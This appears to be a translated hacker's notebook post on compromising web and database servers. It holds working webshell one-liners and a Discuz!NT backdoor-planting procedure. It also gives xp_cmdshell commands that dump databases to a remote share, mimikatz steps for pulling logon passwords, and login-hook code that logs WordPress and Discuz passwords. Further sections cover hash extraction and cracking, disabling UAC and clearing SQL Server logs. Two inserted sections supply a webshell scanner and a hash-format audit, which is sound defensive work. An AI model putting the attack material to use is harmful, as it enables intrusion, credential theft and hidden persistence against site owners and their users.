Discuz!NT 3.5 penetration key points:
(1) Visit site-url/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-liner backdoor is now at http://somesite.com.cn/tools/rss.aspx, password pass.

d:\rar.exe a -r d:\1.rar d:\website\
Recursively compress website.
Mind the path of rar.exe.
<?php

$telok = "0${@eval($_POST[xxoo])}";

$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";

?>
A PHP one-liner trojan inserted into a config file whose values are not filtered.
Dumping the database when the web and database servers are separate:
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
When restrictions leave you unable to write a full shell and you only have a one-liner, it is actually enough for whatever you need, just not very direct or convenient, for example when dumping the database.
This uses the shell client's expert mode (write the code yourself).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not select database: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Query failed: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
if ($tmp !== '') { // flush the last partial batch, otherwise the trailing rows are never written
    file_put_contents('/home/httpd/bbs.xxxxx/forumdata/cache/user'.(intval($i/500)+1).'.txt', $tmp);
}
mysql_free_result($result);

// delete after downloading
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect OS fingerprints.
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    identifies the name servers, gets DNS information
host -l www.owasp.org ns1.secure.net    tries to request a zone transfer for owasp.org
Netcraft DNS search service, at http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com  syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/  syntax: http://whois.webhosting.info/x.x.x.x/

DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still non-public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)

set names gb2312
Importing the database failed with "Data too long for column 'username' at row 1"; the cause is that Chinese characters are not supported under the default charset.

MySQL password change:
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

During intrusions I came across many advanced PHP one-liner trojans. Recorded here so they can be searched for and removed by keyword later.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

// Chopper one-liner

2.
$filename=$_GET['xbid'];

include ($filename);

// dangerous include function: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

// renames (copies) any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST['h'],"Access");

// Chopper one-liner

5. include ($uid);

// dangerous include function: compiles and runs any file as PHP, via POST

// one-liner embedded in a gif

6. Typical one-liners
Program backdoor code
<?php eval_r($_POST[sb])?>
Program code
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Program code
<?php assert($_POST[sb]);?>
// run the relevant PHP statements through the expert mode of the lanker one-liner client
Program code
<?$_POST['sa']($_POST['sb']);?>
Program code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Program code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, when setting up the connection in the Chopper one-liner client, enter the following in the "config" field
Program code
<O>h=@eval_r($_POST[c]);</O>
Program code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a restriction on <?
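The post says these patterns are worth recording so infected files can be found by keyword later. The scanner below is an added example, not part of the original post: it turns the listed one-liners into regular-expression rules and runs them over a web root. The rule names, the directory walk and the constructed sample strings are my own; the two final rules anticipate the credential-logging snippets (wp-login.php, uc_client/client.php) further down the post.

```python
import os
import re
import sys

# One rule per pattern family in the list above: (name, regex).
RULES = [
    ("eval of request data", re.compile(r"\beval(?:_r)?\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I)),
    ("assert of request data", re.compile(r"\bassert\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I)),
    ("/e pattern passed to preg_replace or a variable function",
     re.compile(r"(?:preg_replace|\$\w+)\s*\(\s*[\"'][^\"']*/e[\"']", re.I)),
    ("request value called as a function", re.compile(r"\$_(?:POST|GET|REQUEST)\s*\[[^\]]+\]\s*\(", re.I)),
    ("function name built from single-character strings",
     re.compile(r"(?:[\"'][a-z_][\"']\s*\.\s*){3,}[\"'][a-z_][\"']", re.I)),
    ("include/require of a variable", re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I)),
    ("copy of an uploaded file", re.compile(r"\bcopy\s*\(\s*\$_FILES\b", re.I)),
    ("eval inside ${} string interpolation", re.compile(r"\$\{\s*@?eval", re.I)),
    ("PHP code in a script language=php tag", re.compile(r"<script\s+language\s*=\s*[\"']php[\"']", re.I)),
    # The last two match the credential-logging snippets shown later in the post.
    ("posted password written to a file",
     re.compile(r"\$_POST\s*\[\s*[\"']?(?:pwd|password|pass)[\"']?\s*\][\s\S]*?\b(?:fwrite|file_put_contents)\s*\(", re.I)),
    ("exit-guarded data file saved as .php", re.compile(r"<\?(?:php)?\s*exit\s*\(\s*\)\s*;?\s*\?>", re.I)),
]


def scan_php(source):
    """Return the names of every rule that fires on one PHP source text."""
    return [name for name, rx in RULES if rx.search(source)]


def scan_tree(root):
    """Walk a web root; map each PHP file that has findings to its rule names."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".php", ".phtml", ".inc")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples: one-liners quoted in the post plus one benign file.
SAMPLES = {
    "chopper": '<?php $hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST[\'h\'],"Access"); ?>',
    "include": "<?php $filename=$_GET['xbid']; include ($filename); ?>",
    "callable": "<?$_POST['sa']($_POST['sb']);?>",
    "script_tag": '<script language="php">@eval_r($_POST[sb])</script>',
    "config": '<?php $telok = "0${@eval($_POST[xxoo])}"; ?>',
    "benign": "<?php echo htmlspecialchars($_POST['name']); ?>",
}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # scan the directory given on the command line
        for path, hits in sorted(scan_tree(sys.argv[1]).items()):
            print(path, hits)
    else:  # no argument: show which rules each built-in sample triggers
        for label, src in SAMPLES.items():
            print(label, scan_php(src))
```

The rules are deliberately loose (a variable function called with any /e pattern, any include of a variable), so treat hits as review candidates rather than verdicts.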

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. exit to quit; do not just close the window, otherwise the system will crash.

http://www.monyer.com/demo/monyerjs/  fairly complete JS decoding site

Automatically check for missing high-risk patches:
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

ASPX one-liner backdoor that gets past SafeDog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

Logging WordPress login passwords from a webshell
Log WordPress login passwords from a webshell to make further social engineering easier.
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
    @fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login the logging code is triggered; you can also put it in the default branch of the switch ... case statement.
Just search for case 'login'
and insert it right below; the logged passwords end up in pwd.txt.
Modifying wp-login.php is not really a good approach, it is easily noticed; there are other methods, noting this for the record.

Using the IIS6 file parsing vulnerability to bypass SafeDog:
;antian365.asp;antian365.jpg
Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
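The hash layouts described in the SQL Server and MySQL sections above, as an added example that is not part of the original post: it parses the 0x0100 | salt | hash(es) structure, tells the two MySQL formats apart, and flags logins whose stored hash is still in the weaker SQL Server 2000 or pre-4.1 MySQL form so they can be reset. The function names and the row tuples are my assumptions; the hash values are the ones quoted in the post.

```python
import hashlib

HEX = set("0123456789abcdefABCDEF")


def parse_mssql_hash(hexstr):
    """Split a SQL Server 2000/2005 hash into the fields listed above:
    2-byte 0x0100 header, 4-byte salt, 20-byte SHA-1 of the case-sensitive
    password, and (2000 only) a second SHA-1 of the upper-cased password."""
    raw = bytes.fromhex(hexstr[2:] if hexstr[:2].lower() == "0x" else hexstr)
    if raw[:2] != b"\x01\x00" or len(raw) not in (26, 46):
        raise ValueError("not a 0x0100 SQL Server password hash")
    return {
        "salt": raw[2:6].hex().upper(),
        "case_sensitive": raw[6:26].hex().upper(),
        "upper_case": raw[26:46].hex().upper() if len(raw) == 46 else None,
        "weak_sql2000_format": len(raw) == 46,  # upper-case variant present
    }


def mysql41_hash(password):
    """MySQL 4.1+ PASSWORD(): '*' followed by hex(SHA1(SHA1(password)))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify_mysql_hash(stored):
    """'pre41' for the 16-hex-digit legacy format, 'mysql41' for the 41-char one."""
    if len(stored) == 41 and stored[0] == "*" and set(stored[1:]) <= HEX:
        return "mysql41"
    if len(stored) == 16 and set(stored) <= HEX:
        return "pre41"
    return "unknown"


def audit_logins(mssql_rows, mysql_rows):
    """Flag logins stored in a weak format. mssql_rows: (name, hex hash) from the
    sysxlogins query; mysql_rows: (user, host, password) from mysql.user."""
    findings = []
    for name, h in mssql_rows:
        if parse_mssql_hash(h)["weak_sql2000_format"]:
            findings.append(("mssql", name, "2000-format hash with upper-case variant"))
    for user, host, pw in mysql_rows:
        if pw == "":
            findings.append(("mysql", f"{user}@{host}", "empty password"))
        elif classify_mysql_hash(pw) == "pre41":
            findings.append(("mysql", f"{user}@{host}", "pre-4.1 legacy hash"))
    return findings


# Constructed rows built from the hash values quoted in the post.
MSSQL_ROWS = [
    ("sa", "0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A"),
    ("app", "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"),
]
MYSQL_ROWS = [
    ("root", "localhost", "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"),
    ("legacy", "%", "6f8c114b58f2ce9e"),
    ("anon", "%", ""),
]
```

Feed `audit_logins` the output of the two queries quoted above to get a list of accounts to reset; `mysql41_hash("mypass")` reproduces the post's 4.1+ table entry.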

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$;
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored....

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

SQL Server 2008 log clearing; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
clear the corresponding entries in the registry under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission changes
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has a "管理员取得所有权" (take ownership as administrator) entry; if it does not, import the following .reg file:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Win7 right-click "take ownership as administrator" .reg import
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui":
1. The "notepad.exe" in C:\Windows does not need replacing
2. The "notepad.exe" in C:\Windows\System32 does not need replacing
3. Leave the four "notepad.exe.mui" alone
4. Mainly replace the "notepad.exe" under the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders;
after replacing, go back to the desktop, create a new txt file and open it to check that it has changed.
Disabling the security policy on Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Edit client.php in the uc_client directory; directly below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the following code; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php under the ipdata directory to view the records, password: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);